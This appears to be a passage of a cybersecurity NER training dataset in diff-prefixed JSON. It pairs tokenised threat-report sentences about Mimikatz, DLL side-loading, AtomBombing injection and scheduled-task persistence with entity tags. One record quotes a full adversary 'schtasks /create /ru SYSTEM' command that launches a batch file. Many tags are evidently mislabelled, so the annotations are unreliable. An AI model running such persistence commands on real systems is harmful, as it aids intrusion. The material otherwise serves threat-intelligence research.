"ner_tags": [ - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "B-SamFile", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "adversary", - "executes", - "Cobalt", - "Strike’s", - "built-in", - "Mimikatz", - "to", - "dump", - "its", - "password", - "hashes." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "We", - "observed", - "the", - "use", - "of", - "Mimikatz", - "on", - "this", - "system", - "and", - "saw", - "the", - "hashes", - "of", - "the", - "logged", - "in", - "domain", - "admin", - "account", - "going" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "actor", - "executes", - "Cobalt", - "Strike’s", - "built-in", - "Mimikatz", - "to", - "dump", - "its", - "credentials", - "or", - "password", - "hash" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - ",", - "staged", - "on", - "another", - "system", - "of", - "the", - "victim,", - "and", - "from", - "there", - "copied", - "to", - "a", - "OneDrive-account", - "controlled", - "by", - "the", - "adversary." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Files", - "and", - "folders", - "of", - "interest", - "are", - "collected", - "as", - "well", - "and", - "staged", - "for", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "We’ve", - "seen", - "the", - "adversary", - "staging", - "data", - "on", - "a", - "remote", - "system", - "or", - "on", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "activity", - "group", - "always", - "uses", - "a", - "renamed", - "version", - "of", - "rar.exe." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "adversary", - "copied", - "those", - "tools", - "over", - "SMB", - "from", - "compromised", - "system", - "to", - "compromised", - "system", - "wherever", - "they", - "needed", - "these", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "DLL’s", - "used", - "were", - "side-loaded", - "in", - "memory", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "File", - "deletion" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Use", - "scheduled", - "tasks" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "adversary", - "heavily", - "relies", - "on", - "scheduled", - "tasks", - "for", - "executing", - "a", - "batch-file", - "(.bat)", - "to", - "perform", - "their", - "tasks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "example", - "of", - "the", - "creation", - "of", - "such", - "a", - "scheduled", - "task", - "by", - "the", - "adversary:", - "schtasks", - "/create", - "/ru", - "\"SYSTEM\"", - "/tn", - "\"update\"", - "/tr", - "\"cmd", - "/c", - "c:\\windows\\temp\\update.bat\"", - "/sc", - "once", - "/f", - "/st", - "06:59:00" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "batch", - "files", - "for", - "automation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch-files", - "appear", - "to", - "be", - "used", - "to", - "load", - "the", - "Cobalt", - "Strike", - "beacon,", - "but", - "also", - "to", - "perform", - "discovery", - "commands", - "on", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executing", - "a", - "batch-file", - "(.bat)", - "to", - "perform", - "their", - "tasks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "switched", - "to", - "C2", - "encapsulated", - "in", - "HTTPS", - "in", - "Q3", - "2019." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "the", - "adversary", - "achieving", - "credentials", - "access", - "by", - "brute", - "force" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "adversary", - "installs", - "a", - "hackers", - "best", - "friend", - "during", - "the", - "intrusion:", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "adversary", - "also", - "searches", - "for", - "VPN", - "and", - "firewall", - "configs," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-OffAct", - "O" - ] - }, - { - "tokens": [ - "This", - "lures", - "users", - "to", - "double-click", - "the", - "graphic", - "to", - "view", - "the", - "content," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malicious", - "documents", - "that", - "implement", - "this", - "technique", - "require", - "users", - "to", - "double-click", - "a", - "document", - "element." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "capturing", - "screenshots" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "enumerating", - "files", - "and", - "drives" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "establish", - "persistence", - "by", - "creating", - "a", - "registry", - "key", - "under", - "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", - "only", - "if", - "the", - "victim’s", - "machine", - "name", - "differs." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "include", - "exfiltrating", - "system", - "information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "implement", - "different", - "obfuscation", - "techniques", - "of", - "varying", - "intensities,", - "for", - "example,", - "simple", - "function", - "name", - "malformation", - "and", - "dynamic", - "string", - "resolution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Tool", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "obfuscation", - "techniques", - "used" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "using", - "Crypto", - "Obfuscator," - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "malicious", - "dynamic", - "link", - "library", - "(DLL)", - "file", - "that’s", - "eventually", - "side-loaded", - "to", - "the", - "application." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "a", - "side-loading", - "vulnerability", - "that" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "We’ve", - "seen", - "the", - "payload", - "delivered", - "in", - "diverse", - "ways", - "including", - "DLL", - "side-loading," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "abuse", - "legitimate", - "applications", - "vulnerable", - "to", - "DLL", - "side-loading", - "attack." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "DLL", - "Side-Loading" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "A", - "benign,", - "legitimate", - "executable", - "abused", - "to", - "side-load", - "the", - "malicious", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malicious", - "side", - "loaded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WDSyncService.exe", - "executable", - "abused", - "to", - "side-load", - "a", - "malicious", - "DLL" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Side", - "loaded", - "malicious", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "abused", - "to", - "side-load", - "the", - "malicious", - "DLL." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executable", - "abused", - "to", - "side-load", - "malicious", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DLL", - "Side-Loading" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "DLL", - "Side-Loading" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "that", - "is", - "abused", - "to", - "side-load", - "a", - "malicious", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "executable", - "that", - "dropped", - "a", - "legitimate", - "WD", - "Discovery", - "app", - "to", - "side-load", - "the", - "malicious", - "WDLocal.dll" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "side-loads", - "malicious", - "WDLocal.dll", - "The", - "side-loaded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "side-loading", - "is", - "a", - "highly", - "effective", - "technique", - "for", - "tricking", - "Windows", - "systems", - "into", - "loading", - "malicious", - "code." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversaries", - "use", - "side-loading", - "attacks", - "for", - "execution" - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "executable", - "starts", - "running,", - "it", - "side-loads", - "the", - "malicious", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "lure", - "victims", - "into", - "downloading", - "a", - "malicious", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "designed", - "to", - "steal", - "sensitive", - "information,", - "including", - "login", - "data,", - "cookies,", - "and", - "Facebook", - "ad", - "and", - "business", - "account", - "information." - ], - "ner_tags": [ - "O", - "O", - "I-Purp", - "I-Purp", - "B-Features", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "scripts", - "are", - "encoded", - "using", - "different", - "techniques," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "(base64", - "encoded", - "with", - "string", - "replacements)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "are", - "compressed", - "and", - "encrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Base64", - "encoded", - "string", - "with", - "several", - "string", - "replacements." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "self-written", - "extensions", - "that", - "obfuscate", - "the", - "PHP", - "scripts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "And", - "malicious", - "payloads", - "are", - "also", - "sometimes", - "encrypted/packed", - "or", - "obfuscated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "with", - "SmartAssembly" - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "base64", - "encoded", - "with", - "some", - "string", - "modifications" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "downloads", - "the", - "file", - "from", - "its", - "command", - "and", - "control", - "(C2)", - "server," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they’re", - "downloaded", - "from", - "the", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes,", - "it", - "drops", - "a", - "PHP", - "application", - "with", - "additional", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Download", - "and", - "run" - ], - "ner_tags": [ - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Downloads", - "a", - "file", - "from", - "the", - "given", - "URL", - "and", - "executes", - "it", - "with", - "the", - "given", - "arguments." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "given", - "task", - "the", - "downloaded", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "new", - "stealer", - "is", - "downloaded", - "and", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Upload", - "file", - "function" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "then", - "decodes", - "and", - "executes", - "it." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "main", - "thread", - "the", - "SFX/ZIP", - "file", - "is", - "executed/decompressed," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "that", - "decodes", - "and", - "drops", - "three", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "starts", - "with", - "de-obfuscating", - "the", - "next", - "stage", - "(string", - "replacements", - "+", - "base64", - "decoding)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "decoded,", - "this", - "executable,", - "written", - "in", - "Rust", - "and", - "compiled", - "with", - "Cargo,", - "gets", - "the", - "current", - "date", - "and", - "time,", - "and", - "decrypts", - "Chromium-based", - "browsers’", - "encryption", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "does", - "this", - "by", - "decoding", - "the", - "rss.txt", - "into", - "an", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "executable", - "decodes", - "and", - "drops", - "the", - "next", - "stage" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "creates", - "a", - "scheduled", - "task", - "that", - "runs", - "the", - "Rust", - "executable", - "by", - "passing", - "it", - "as", - "an", - "argument", - "to", - "rhc.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "registers", - "a", - "new", - "scheduled", - "task", - "to", - "trigger", - "every", - "day", - "and", - "repeat", - "every", - "hour", - "with", - "option", - "“d”", - "as", - "an", - "argument." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creates", - "a", - "scheduled", - "task", - "to", - "be", - "executed", - "with", - "d", - "as", - "an", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Responsible", - "for", - "installing", - "persistence", - "via", - "scheduled", - "tasks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "attacker", - "must", - "know", - "the", - "time", - "to", - "set", - "it", - "in", - "the", - "scheduled", - "task." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "createTS—creates", - "scheduled", - "task.", - "createLG—creates", - "scheduled", - "task", - "at", - "logon" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "creates", - "a", - "scheduled", - "task", - "that", - "executes", - "the", - "updated", - "routine,", - "which", - "triggers", - "at", - "log-on", - "and", - "every", - "30", - "minutes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "registers", - "two", - "scheduled", - "tasks:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "embeds", - "legitimate", - "DLLs", - "using", - "the", - "SmartAssembly", - "feature" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Once", - "the", - "execution", - "completes,", - "the", - "file", - "is", - "deleted", - "to", - "leave", - "no", - "evidence", - "on", - "the", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "file", - "is", - "deleted", - "to", - "remove", - "evidence", - "from", - "the", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "passes", - "this", - "command", - "line", - "as", - "an", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gets", - "a", - "command", - "to", - "run,", - "executes", - "it" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gets", - "command", - "from", - "C2", - "and", - "executes", - "it" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Executable", - "that", - "accepts", - "an", - "executable", - "as", - "an", - "argument", - "and", - "executes", - "it", - "with", - "hidden", - "console" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“wmic", - "os", - "get", - "LocalDateTime", - "/value”." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "steal", - "the", - "victim’s", - "Facebook", - "information", - "and", - "send", - "it", - "back", - "to", - "the", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Extract", - "victim’s", - "sensitive", - "Facebook", - "data", - "using", - "the", - "graph", - "API", - "and", - "send", - "the", - "results", - "to", - "a", - "C2", - "server" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "can", - "extract", - "this", - "information", - "and", - "send", - "it", - "to", - "its", - "command", - "and", - "control", - "(C2)", - "server" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "API", - "functions." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "API", - "calls" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "API", - "calls" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "calls", - "point", - "to", - "a", - "suspicious", - "API" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creation", - "functions", - "like", - "NtCreateUserProcess,", - "NtCreateProcessEx,", - "CreateProcessInternalW,", - "CreateProcessA", - "or", - "CreateProcessW." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "an", - "exported", - "function", - "from", - "one", - "of", - "the", - "Windows", - "libraries" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "suspicious", - "APIs", - "often", - "used", - "in", - "code", - "injection", - "techniques", - "like", - "CreateRemoteThread", - "or", - "NtSetContextThread." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "frequently", - "called", - "API", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "critical", - "APIs" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Microsoft", - "Outlook", - "Messaging", - "API", - "(MAPI)", - "module" - ], - "ner_tags": [ - "O", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "process", - "creation", - "library", - "functions" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "calls", - "the", - "NtProtectVirtualMemory", - "function", - "where", - "the", - "NewAccessProtection", - "argument", - "is", - "PAGE_EXECUTE_READWRITE", - "and", - "the", - "BaseAddress", - "argument", - "is", - "an", - "address", - "to", - "a", - "library", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "a", - "variation", - "of", - "AtomBombing", - "that", - "queues", - "an", - "APC", - "to", - "call", - "memset", - "to", - "clean", - "an", - "RW", - "region", - "in", - "ntdll.dll." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "dispatch", - "an", - "asynchronous", - "procedure", - "call", - "(APC)", - "to", - "the", - "APC", - "queue", - "of", - "a", - "target", - "process", - "thread", - "using", - "NtQueueApcThread" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "injector", - "process", - "dispatches", - "another", - "APC", - "using", - "NtQueueApcThread", - "to", - "force", - "the", - "remote", - "process", - "to", - "execute", - "NtSetContextThread." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "queues", - "an", - "APC", - "into", - "the", - "patched", - "GlobalGetAtomA", - "to", - "get", - "the", - "payload", - "running." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APC", - "routine", - "argument", - "in", - "the", - "case", - "of", - "NtQueueApcThread," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "AtomBombing", - "is", - "the", - "write-primitive,", - "which", - "allows", - "writing", - "to", - "the", - "remote", - "process", - "using", - "atom", - "tables", - "and", - "APC." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "AtomBombing", - "Injection", - "Technique" - ], - "ner_tags": [ - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "AtomBombing", - "is", - "a", - "technique", - "that", - "allows", - "malware", - "to", - "inject", - "code", - "while", - "avoiding", - "calling", - "suspicious", - "APIs" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malware", - "using", - "the", - "AtomBombing", - "technique", - "first", - "writes", - "the", - "payload", - "into", - "the", - "global", - "atom", - "table,", - "which", - "can", - "be", - "accessed", - "by", - "all", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "a", - "slightly", - "modified", - "AtomBombing", - "technique", - "that", - "injects", - "one", - "of", - "its", - "stages", - "into", - "a", - "Windows", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "can", - "read", - "HTTP-POST", - "headers" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "the", - "main", - "bot", - "into", - "svchost.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Injected", - "Processes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "Injection", - "via", - "Hooking" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "use", - "this", - "technique", - "to", - "inject", - "themselves", - "into", - "other", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "inject", - "their", - "main", - "bot", - "into", - "a", - "Windows", - "process,", - "and", - "then", - "inject", - "their", - "other", - "modules", - "into", - "different", - "processes", - "according", - "to", - "the", - "module’s", - "purpose" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "injection", - "into", - "a", - "web", - "browser", - "process." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injected", - "thread" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "suspend", - "the", - "remote", - "process", - "threads" - ], - 